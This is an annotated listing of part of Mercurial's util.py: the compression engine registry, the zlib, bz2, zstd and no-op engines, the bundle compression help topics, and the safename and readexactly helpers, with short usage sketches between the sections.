3226 3226 extensions.
3227 3227
3228 3228 Compressors are registered against the global instance by calling its
3229 3229 ``register()`` method.
3230 3230 """
3231 3231 def __init__(self):
3232 3232 self._engines = {}
3233 3233 # Bundle spec human name to engine name.
3234 3234 self._bundlenames = {}
3235 3235 # Internal bundle identifier to engine name.
3236 3236 self._bundletypes = {}
3237 3237 # Revlog header to engine name.
3238 3238 self._revlogheaders = {}
3239 3239 # Wire proto identifier to engine name.
3240 3240 self._wiretypes = {}
3241 3241
3242 3242 def __getitem__(self, key):
3243 3243 return self._engines[key]
3244 3244
3245 3245 def __contains__(self, key):
3246 3246 return key in self._engines
3247 3247
3248 3248 def __iter__(self):
3249 3249 return iter(self._engines.keys())
3250 3250
3251 3251 def register(self, engine):
3252 3252 """Register a compression engine with the manager.
3253 3253
3254 3254 The argument must be a ``compressionengine`` instance.
3255 3255 """
3256 3256 if not isinstance(engine, compressionengine):
3257 3257 raise ValueError(_('argument must be a compressionengine'))
3258 3258
3259 3259 name = engine.name()
3260 3260
3261 3261 if name in self._engines:
3262 3262 raise error.Abort(_('compression engine %s already registered') %
3263 3263 name)
3264 3264
3265 3265 bundleinfo = engine.bundletype()
3266 3266 if bundleinfo:
3267 3267 bundlename, bundletype = bundleinfo
3268 3268
3269 3269 if bundlename in self._bundlenames:
3270 3270 raise error.Abort(_('bundle name %s already registered') %
3271 3271 bundlename)
3272 3272 if bundletype in self._bundletypes:
3273 3273 raise error.Abort(_('bundle type %s already registered by %s') %
3274 3274 (bundletype, self._bundletypes[bundletype]))
3275 3275
3276 3276 # No external facing name declared.
3277 3277 if bundlename:
3278 3278 self._bundlenames[bundlename] = name
3279 3279
3280 3280 self._bundletypes[bundletype] = name
3281 3281
3282 3282 wiresupport = engine.wireprotosupport()
3283 3283 if wiresupport:
3284 3284 wiretype = wiresupport.name
3285 3285 if wiretype in self._wiretypes:
3286 3286 raise error.Abort(_('wire protocol compression %s already '
3287 3287 'registered by %s') %
3288 3288 (wiretype, self._wiretypes[wiretype]))
3289 3289
3290 3290 self._wiretypes[wiretype] = name
3291 3291
3292 3292 revlogheader = engine.revlogheader()
3293 3293 if revlogheader and revlogheader in self._revlogheaders:
3294 3294 raise error.Abort(_('revlog header %s already registered by %s') %
3295 3295 (revlogheader, self._revlogheaders[revlogheader]))
3296 3296
3297 3297 if revlogheader:
3298 3298 self._revlogheaders[revlogheader] = name
3299 3299
3300 3300 self._engines[name] = engine
3301 3301
3302 3302 @property
3303 3303 def supportedbundlenames(self):
3304 3304 return set(self._bundlenames.keys())
3305 3305
3306 3306 @property
3307 3307 def supportedbundletypes(self):
3308 3308 return set(self._bundletypes.keys())
3309 3309
3310 3310 def forbundlename(self, bundlename):
3311 3311 """Obtain a compression engine registered to a bundle name.
3312 3312
3313 3313 Will raise KeyError if the bundle type isn't registered.
3314 3314
3315 3315 Will abort if the engine is known but not available.
3316 3316 """
3317 3317 engine = self._engines[self._bundlenames[bundlename]]
3318 3318 if not engine.available():
3319 3319 raise error.Abort(_('compression engine %s could not be loaded') %
3320 3320 engine.name())
3321 3321 return engine
3322 3322
3323 3323 def forbundletype(self, bundletype):
3324 3324 """Obtain a compression engine registered to a bundle type.
3325 3325
3326 3326 Will raise KeyError if the bundle type isn't registered.
3327 3327
3328 3328 Will abort if the engine is known but not available.
3329 3329 """
3330 3330 engine = self._engines[self._bundletypes[bundletype]]
3331 3331 if not engine.available():
3332 3332 raise error.Abort(_('compression engine %s could not be loaded') %
3333 3333 engine.name())
3334 3334 return engine
3335 3335
3336 3336 def supportedwireengines(self, role, onlyavailable=True):
3337 3337 """Obtain compression engines that support the wire protocol.
3338 3338
3339 3339 Returns a list of engines in prioritized order, most desired first.
3340 3340
3341 3341 If ``onlyavailable`` is set, filter out engines that can't be
3342 3342 loaded.
3343 3343 """
3344 3344 assert role in (SERVERROLE, CLIENTROLE)
3345 3345
3346 3346 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3347 3347
3348 3348 engines = [self._engines[e] for e in self._wiretypes.values()]
3349 3349 if onlyavailable:
3350 3350 engines = [e for e in engines if e.available()]
3351 3351
3352 3352 def getkey(e):
3353 3353 # Sort first by priority, highest first. In case of tie, sort
3354 3354 # alphabetically. This is arbitrary, but ensures output is
3355 3355 # stable.
3356 3356 w = e.wireprotosupport()
3357 3357 return -1 * getattr(w, attr), w.name
3358 3358
3359 3359 return list(sorted(engines, key=getkey))
3360 3360
3361 3361 def forwiretype(self, wiretype):
3362 3362 engine = self._engines[self._wiretypes[wiretype]]
3363 3363 if not engine.available():
3364 3364 raise error.Abort(_('compression engine %s could not be loaded') %
3365 3365 engine.name())
3366 3366 return engine
3367 3367
3368 3368 def forrevlogheader(self, header):
3369 3369 """Obtain a compression engine registered to a revlog header.
3370 3370
3371 3371 Will raise KeyError if the revlog header value isn't registered.
3372 3372 """
3373 3373 return self._engines[self._revlogheaders[header]]
3374 3374
3375 3375 compengines = compressormanager()
3376 3376
3377 3377 class compressionengine(object):
3378 3378 """Base class for compression engines.
3379 3379
3380 3380 Compression engines must implement the interface defined by this class.
3381 3381 """
3382 3382 def name(self):
3383 3383 """Returns the name of the compression engine.
3384 3384
3385 3385 This is the key the engine is registered under.
3386 3386
3387 3387 This method must be implemented.
3388 3388 """
3389 3389 raise NotImplementedError()
3390 3390
3391 3391 def available(self):
3392 3392 """Whether the compression engine is available.
3393 3393
3394 3394 The intent of this method is to allow optional compression engines
3395 3395 that may not be available in all installations (such as engines relying
3396 3396 on C extensions that may not be present).
3397 3397 """
3398 3398 return True
3399 3399
3400 3400 def bundletype(self):
3401 3401 """Describes bundle identifiers for this engine.
3402 3402
3403 3403 If this compression engine isn't supported for bundles, returns None.
3404 3404
3405 3405 If this engine can be used for bundles, returns a 2-tuple of strings of
3406 3406 the user-facing "bundle spec" compression name and an internal
3407 3407 identifier used to denote the compression format within bundles. To
3408 3408 exclude the name from external usage, set the first element to ``None``.
3409 3409
3410 3410 If bundle compression is supported, the class must also implement
3411 3411 ``compressstream`` and ``decompressorreader``.
3412 3412
3413 3413 The docstring of this method is used in the help system to tell users
3414 3414 about this engine.
3415 3415 """
3416 3416 return None
3417 3417
3418 3418 def wireprotosupport(self):
3419 3419 """Declare support for this compression format on the wire protocol.
3420 3420
3421 3421 If this compression engine isn't supported for compressing wire
3422 3422 protocol payloads, returns None.
3423 3423
3424 3424 Otherwise, returns ``compenginewireprotosupport`` with the following
3425 3425 fields:
3426 3426
3427 3427 * String format identifier
3428 3428 * Integer priority for the server
3429 3429 * Integer priority for the client
3430 3430
3431 3431 The integer priorities are used to order the advertisement of format
3432 3432 support by server and client. The highest integer is advertised
3433 3433 first. Integers with non-positive values aren't advertised.
3434 3434
3435 3435 The priority values are somewhat arbitrary and only used for default
3436 3436 ordering. The relative order can be changed via config options.
3437 3437
3438 3438 If wire protocol compression is supported, the class must also implement
3439 3439 ``compressstream`` and ``decompressorreader``.
3440 3440 """
3441 3441 return None
3442 3442
3443 3443 def revlogheader(self):
3444 3444 """Header added to revlog chunks that identifies this engine.
3445 3445
3446 3446 If this engine can be used to compress revlogs, this method should
3447 3447 return the bytes used to identify chunks compressed with this engine.
3448 3448 Else, the method should return ``None`` to indicate it does not
3449 3449 participate in revlog compression.
3450 3450 """
3451 3451 return None
3452 3452
3453 3453 def compressstream(self, it, opts=None):
3454 3454 """Compress an iterator of chunks.
3455 3455
3456 3456 The method receives an iterator (ideally a generator) of chunks of
3457 3457 bytes to be compressed. It returns an iterator (ideally a generator)
3458 3458 of bytes of chunks representing the compressed output.
3459 3459
3460 3460 Optionally accepts an argument defining how to perform compression.
3461 3461 Each engine treats this argument differently.
3462 3462 """
3463 3463 raise NotImplementedError()
3464 3464
3465 3465 def decompressorreader(self, fh):
3466 3466 """Perform decompression on a file object.
3467 3467
3468 3468 Argument is an object with a ``read(size)`` method that returns
3469 3469 compressed data. Return value is an object with a ``read(size)`` that
3470 3470 returns uncompressed data.
3471 3471 """
3472 3472 raise NotImplementedError()
3473 3473
3474 3474 def revlogcompressor(self, opts=None):
3475 3475 """Obtain an object that can be used to compress revlog entries.
3476 3476
3477 3477 The object has a ``compress(data)`` method that compresses binary
3478 3478 data. This method returns compressed binary data or ``None`` if
3479 3479 the data could not be compressed (too small, not compressible, etc).
3480 3480 The returned data should have a header uniquely identifying this
3481 3481 compression format so decompression can be routed to this engine.
3482 3482 This header should be identified by the ``revlogheader()`` return
3483 3483 value.
3484 3484
3485 3485 The object has a ``decompress(data)`` method that decompresses
3486 3486 data. The method will only be called if ``data`` begins with
3487 3487 ``revlogheader()``. The method should return the raw, uncompressed
3488 3488 data or raise a ``RevlogError``.
3489 3489
3490 3490 The object is reusable but is not thread safe.
3491 3491 """
3492 3492 raise NotImplementedError()
3493 3493
3494 3494 class _zlibengine(compressionengine):
3495 3495 def name(self):
3496 3496 return 'zlib'
3497 3497
3498 3498 def bundletype(self):
3499 3499 """zlib compression using the DEFLATE algorithm.
3500 3500
3501 3501 All Mercurial clients should support this format. The compression
3502 3502 algorithm strikes a reasonable balance between compression ratio
3503 3503 and size.
3504 3504 """
3505 3505 return 'gzip', 'GZ'
3506 3506
3507 3507 def wireprotosupport(self):
3508 3508 return compewireprotosupport('zlib', 20, 20)
3509 3509
3510 3510 def revlogheader(self):
3511 3511 return 'x'
3512 3512
3513 3513 def compressstream(self, it, opts=None):
3514 3514 opts = opts or {}
3515 3515
3516 3516 z = zlib.compressobj(opts.get('level', -1))
3517 3517 for chunk in it:
3518 3518 data = z.compress(chunk)
3519 3519 # Not all calls to compress emit data. It is cheaper to inspect
3520 3520 # here than to feed empty chunks through generator.
3521 3521 if data:
3522 3522 yield data
3523 3523
3524 3524 yield z.flush()
3525 3525
3526 3526 def decompressorreader(self, fh):
3527 3527 def gen():
3528 3528 d = zlib.decompressobj()
3529 3529 for chunk in filechunkiter(fh):
3530 3530 while chunk:
3531 3531 # Limit output size to limit memory.
3532 3532 yield d.decompress(chunk, 2 ** 18)
3533 3533 chunk = d.unconsumed_tail
3534 3534
3535 3535 return chunkbuffer(gen())
3536 3536
3537 3537 class zlibrevlogcompressor(object):
3538 3538 def compress(self, data):
3539 3539 insize = len(data)
3540 3540 # Caller handles empty input case.
3541 3541 assert insize > 0
3542 3542
3543 3543 if insize < 44:
3544 3544 return None
3545 3545
3546 3546 elif insize <= 1000000:
3547 3547 compressed = zlib.compress(data)
3548 3548 if len(compressed) < insize:
3549 3549 return compressed
3550 3550 return None
3551 3551
3552 3552 # zlib makes an internal copy of the input buffer, doubling
3553 3553 # memory usage for large inputs. So do streaming compression
3554 3554 # on large inputs.
3555 3555 else:
3556 3556 z = zlib.compressobj()
3557 3557 parts = []
3558 3558 pos = 0
3559 3559 while pos < insize:
3560 3560 pos2 = pos + 2**20
3561 3561 parts.append(z.compress(data[pos:pos2]))
3562 3562 pos = pos2
3563 3563 parts.append(z.flush())
3564 3564
3565 3565 if sum(map(len, parts)) < insize:
3566 3566 return ''.join(parts)
3567 3567 return None
3568 3568
3569 3569 def decompress(self, data):
3570 3570 try:
3571 3571 return zlib.decompress(data)
3572 3572 except zlib.error as e:
3573 3573 raise error.RevlogError(_('revlog decompress error: %s') %
3574 3574 str(e))
3575 3575
3576 3576 def revlogcompressor(self, opts=None):
3577 3577 return self.zlibrevlogcompressor()
3578 3578
3579 3579 compengines.register(_zlibengine())
3580 3580
3581 3581 class _bz2engine(compressionengine):
3582 3582 def name(self):
3583 3583 return 'bz2'
3584 3584
3585 3585 def bundletype(self):
3586 3586 """An algorithm that produces smaller bundles than ``gzip``.
3587 3587
3588 3588 All Mercurial clients should support this format.
3589 3589
3590 3590 This engine will likely produce smaller bundles than ``gzip`` but
3591 3591 will be significantly slower, both during compression and
3592 3592 decompression.
3593 3593
3594 3594 If available, the ``zstd`` engine can yield similar or better
3595 3595 compression at much higher speeds.
3596 3596 """
3597 3597 return 'bzip2', 'BZ'
3598 3598
3599 3599 # We declare a protocol name but don't advertise by default because
3600 3600 # it is slow.
3601 3601 def wireprotosupport(self):
3602 3602 return compewireprotosupport('bzip2', 0, 0)
3603 3603
3604 3604 def compressstream(self, it, opts=None):
3605 3605 opts = opts or {}
3606 3606 z = bz2.BZ2Compressor(opts.get('level', 9))
3607 3607 for chunk in it:
3608 3608 data = z.compress(chunk)
3609 3609 if data:
3610 3610 yield data
3611 3611
3612 3612 yield z.flush()
3613 3613
3614 3614 def decompressorreader(self, fh):
3615 3615 def gen():
3616 3616 d = bz2.BZ2Decompressor()
3617 3617 for chunk in filechunkiter(fh):
3618 3618 yield d.decompress(chunk)
3619 3619
3620 3620 return chunkbuffer(gen())
3621 3621
3622 3622 compengines.register(_bz2engine())
3623 3623
3624 3624 class _truncatedbz2engine(compressionengine):
3625 3625 def name(self):
3626 3626 return 'bz2truncated'
3627 3627
3628 3628 def bundletype(self):
3629 3629 return None, '_truncatedBZ'
3630 3630
3631 3631 # We don't implement compressstream because it is hackily handled elsewhere.
3632 3632
3633 3633 def decompressorreader(self, fh):
3634 3634 def gen():
3635 3635 # The input stream doesn't have the 'BZ' header. So add it back.
3636 3636 d = bz2.BZ2Decompressor()
3637 3637 d.decompress('BZ')
3638 3638 for chunk in filechunkiter(fh):
3639 3639 yield d.decompress(chunk)
3640 3640
3641 3641 return chunkbuffer(gen())
3642 3642
3643 3643 compengines.register(_truncatedbz2engine())
3644 3644
3645 3645 class _noopengine(compressionengine):
3646 3646 def name(self):
3647 3647 return 'none'
3648 3648
3649 3649 def bundletype(self):
3650 3650 """No compression is performed.
3651 3651
3652 3652 Use this compression engine to explicitly disable compression.
3653 3653 """
3654 3654 return 'none', 'UN'
3655 3655
3656 3656 # Clients always support uncompressed payloads. Servers don't because
3657 3657 # unless you are on a fast network, uncompressed payloads can easily
3658 3658 # saturate your network pipe.
3659 3659 def wireprotosupport(self):
3660 3660 return compewireprotosupport('none', 0, 10)
3661 3661
3662 3662 # We don't implement revlogheader because it is handled specially
3663 3663 # in the revlog class.
3664 3664
3665 3665 def compressstream(self, it, opts=None):
3666 3666 return it
3667 3667
3668 3668 def decompressorreader(self, fh):
3669 3669 return fh
3670 3670
3671 3671 class nooprevlogcompressor(object):
3672 3672 def compress(self, data):
3673 3673 return None
3674 3674
3675 3675 def revlogcompressor(self, opts=None):
3676 3676 return self.nooprevlogcompressor()
3677 3677
3678 3678 compengines.register(_noopengine())
3679 3679
3680 3680 class _zstdengine(compressionengine):
3681 3681 def name(self):
3682 3682 return 'zstd'
3683 3683
3684 3684 @propertycache
3685 3685 def _module(self):
3686 3686 # Not all installs have the zstd module available. So defer importing
3687 3687 # until first access.
3688 3688 try:
3689 3689 from . import zstd
3690 3690 # Force delayed import.
3691 3691 zstd.__version__
3692 3692 return zstd
3693 3693 except ImportError:
3694 3694 return None
3695 3695
3696 3696 def available(self):
3697 3697 return bool(self._module)
3698 3698
3699 3699 def bundletype(self):
3700 3700 """A modern compression algorithm that is fast and highly flexible.
3701 3701
3702 3702 Only supported by Mercurial 4.1 and newer clients.
3703 3703
3704 3704 With the default settings, zstd compression is both faster and yields
3705 3705 better compression than ``gzip``. It also frequently yields better
3706 3706 compression than ``bzip2`` while operating at much higher speeds.
3707 3707
3708 3708 If this engine is available and backwards compatibility is not a
3709 3709 concern, it is likely the best available engine.
3710 3710 """
3711 3711 return 'zstd', 'ZS'
3712 3712
3713 3713 def wireprotosupport(self):
3714 3714 return compewireprotosupport('zstd', 50, 50)
3715 3715
3716 3716 def revlogheader(self):
3717 3717 return '\x28'
3718 3718
3719 3719 def compressstream(self, it, opts=None):
3720 3720 opts = opts or {}
3721 3721 # zstd level 3 is almost always significantly faster than zlib
3722 3722 # while providing no worse compression. It strikes a good balance
3723 3723 # between speed and compression.
3724 3724 level = opts.get('level', 3)
3725 3725
3726 3726 zstd = self._module
3727 3727 z = zstd.ZstdCompressor(level=level).compressobj()
3728 3728 for chunk in it:
3729 3729 data = z.compress(chunk)
3730 3730 if data:
3731 3731 yield data
3732 3732
3733 3733 yield z.flush()
3734 3734
3735 3735 def decompressorreader(self, fh):
3736 3736 zstd = self._module
3737 3737 dctx = zstd.ZstdDecompressor()
3738 3738 return chunkbuffer(dctx.read_from(fh))
3739 3739
3740 3740 class zstdrevlogcompressor(object):
3741 3741 def __init__(self, zstd, level=3):
3742 3742 # Writing the content size adds a few bytes to the output. However,
3743 3743 # it allows decompression to be more optimal since we can
3744 3744 # pre-allocate a buffer to hold the result.
3745 3745 self._cctx = zstd.ZstdCompressor(level=level,
3746 3746 write_content_size=True)
3747 3747 self._dctx = zstd.ZstdDecompressor()
3748 3748 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3749 3749 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3750 3750
3751 3751 def compress(self, data):
3752 3752 insize = len(data)
3753 3753 # Caller handles empty input case.
3754 3754 assert insize > 0
3755 3755
3756 3756 if insize < 50:
3757 3757 return None
3758 3758
3759 3759 elif insize <= 1000000:
3760 3760 compressed = self._cctx.compress(data)
3761 3761 if len(compressed) < insize:
3762 3762 return compressed
3763 3763 return None
3764 3764 else:
3765 3765 z = self._cctx.compressobj()
3766 3766 chunks = []
3767 3767 pos = 0
3768 3768 while pos < insize:
3769 3769 pos2 = pos + self._compinsize
3770 3770 chunk = z.compress(data[pos:pos2])
3771 3771 if chunk:
3772 3772 chunks.append(chunk)
3773 3773 pos = pos2
3774 3774 chunks.append(z.flush())
3775 3775
3776 3776 if sum(map(len, chunks)) < insize:
3777 3777 return ''.join(chunks)
3778 3778 return None
3779 3779
3780 3780 def decompress(self, data):
3781 3781 insize = len(data)
3782 3782
3783 3783 try:
3784 3784 # This was measured to be faster than other streaming
3785 3785 # decompressors.
3786 3786 dobj = self._dctx.decompressobj()
3787 3787 chunks = []
3788 3788 pos = 0
3789 3789 while pos < insize:
3790 3790 pos2 = pos + self._decompinsize
3791 3791 chunk = dobj.decompress(data[pos:pos2])
3792 3792 if chunk:
3793 3793 chunks.append(chunk)
3794 3794 pos = pos2
3795 3795 # Frame should be exhausted, so no finish() API.
3796 3796
3797 3797 return ''.join(chunks)
3798 3798 except Exception as e:
3799 3799 raise error.RevlogError(_('revlog decompress error: %s') %
3800 3800 str(e))
3801 3801
3802 3802 def revlogcompressor(self, opts=None):
3803 3803 opts = opts or {}
3804 3804 return self.zstdrevlogcompressor(self._module,
3805 3805 level=opts.get('level', 3))
3806 3806
3807 3807 compengines.register(_zstdengine())
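As a rough sketch of how a registered engine can be exercised through the API defined above (the `util.compengines` registry and the engine methods are the ones shown in this file; the sample data and the use of `io.BytesIO` are assumptions for illustration only, not part of the change):

    # Hedged example: round-trip some data through the zstd engine, but only
    # if the optional zstd bindings are present in this build.
    import io
    from mercurial import util

    engine = util.compengines['zstd']
    if engine.available():
        payload = b'some data worth compressing' * 100
        compressed = b''.join(engine.compressstream(iter([payload])))
        reader = engine.decompressorreader(io.BytesIO(compressed))
        assert reader.read(len(payload)) == payload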
3808 3808
3809 3809 def bundlecompressiontopics():
3810 3810 """Obtains a list of available bundle compressions for use in help."""
3811 3811 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3812 3812 items = {}
3813 3813
3814 3814 # We need to format the docstring. So use a dummy object/type to hold it
3815 3815 # rather than mutating the original.
3816 3816 class docobject(object):
3817 3817 pass
3818 3818
3819 3819 for name in compengines:
3820 3820 engine = compengines[name]
3821 3821
3822 3822 if not engine.available():
3823 3823 continue
3824 3824
3825 3825 bt = engine.bundletype()
3826 3826 if not bt or not bt[0]:
3827 3827 continue
3828 3828
3829 3829 doc = pycompat.sysstr('``%s``\n %s') % (
3830 3830 bt[0], engine.bundletype.__doc__)
3831 3831
3832 3832 value = docobject()
3833 3833 value.__doc__ = doc
3834 3834 value._origdoc = engine.bundletype.__doc__
3835 3835 value._origfunc = engine.bundletype
3836 3836
3837 3837 items[bt[0]] = value
3838 3838
3839 3839 return items
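The items returned above are keyed by bundle type name and carry the formatted engine docstring; a minimal sketch of inspecting one entry (assuming the zstd engine is available in the build):

    # Purely illustrative: look up the help item produced for 'zstd'.
    topics = bundlecompressiontopics()
    value = topics.get('zstd')
    if value is not None:
        # __doc__ starts with the formatted name, i.e. '``zstd``'.
        firstline = value.__doc__.splitlines()[0]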
3840 3840
3841 3841 i18nfunctions = bundlecompressiontopics().values()
3842 3842
3843 3843 # convenient shortcut
3844 3844 dst = debugstacktrace
3845 3845
3846 3846 def safename(f, tag, ctx, others=None):
3847 3847 """
3848 3848 Generate a name that it is safe to rename f to in the given context.
3849 3849
3850 3850 f: filename to rename
3851 3851 tag: a string tag that will be included in the new name
3852 3852 ctx: a context, in which the new name must not exist
3853 3853 others: a set of other filenames that the new name must not be in
3854 3854
3855 3855 Returns a file name of the form oldname~tag[~number] which does not exist
3856 3856 in the provided context and is not in the set of other names.
3857 3857 """
3858 3858 if others is None:
3859 3859 others = set()
3860 3860
3861 3861 fn = '%s~%s' % (f, tag)
3862 3862 if fn not in ctx and fn not in others:
3863 3863 return fn
3864 3864 for n in itertools.count(1):
3865 3865 fn = '%s~%s~%s' % (f, tag, n)
3866 3866 if fn not in ctx and fn not in others:
3867 3867 return fn
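A self-contained sketch of safename's behaviour; the fakectx class below is an assumption standing in for a real changectx, since only membership testing is needed here:

    # Toy stand-in for a context object: only __contains__ matters.
    class fakectx(object):
        def __init__(self, files):
            self._files = set(files)
        def __contains__(self, f):
            return f in self._files

    ctx = fakectx(['a.txt', 'a.txt~backup'])
    # 'a.txt~backup' already exists in ctx, so the numbered fallback kicks in
    # and safename returns 'a.txt~backup~1'.
    name = safename('a.txt', 'backup', ctx)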
3868
3869 def readexactly(stream, n):
3870 '''read n bytes from stream.read and abort if less was available'''
3871 s = stream.read(n)
3872 if len(s) < n:
3873 raise error.Abort(_("stream ended unexpectedly"
3874 " (got %d bytes, expected %d)")
3875 % (len(s), n))
3876 return s
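A short, purely illustrative sketch of the relocated helper using an in-memory stream (io.BytesIO is an assumption; any object with a read() method works):

    import io

    stream = io.BytesIO(b'abcdef')
    readexactly(stream, 4)    # -> 'abcd'
    readexactly(stream, 2)    # -> 'ef'
    # A further readexactly(stream, 1) would raise error.Abort, since fewer
    # bytes remain than were requested ("stream ended unexpectedly").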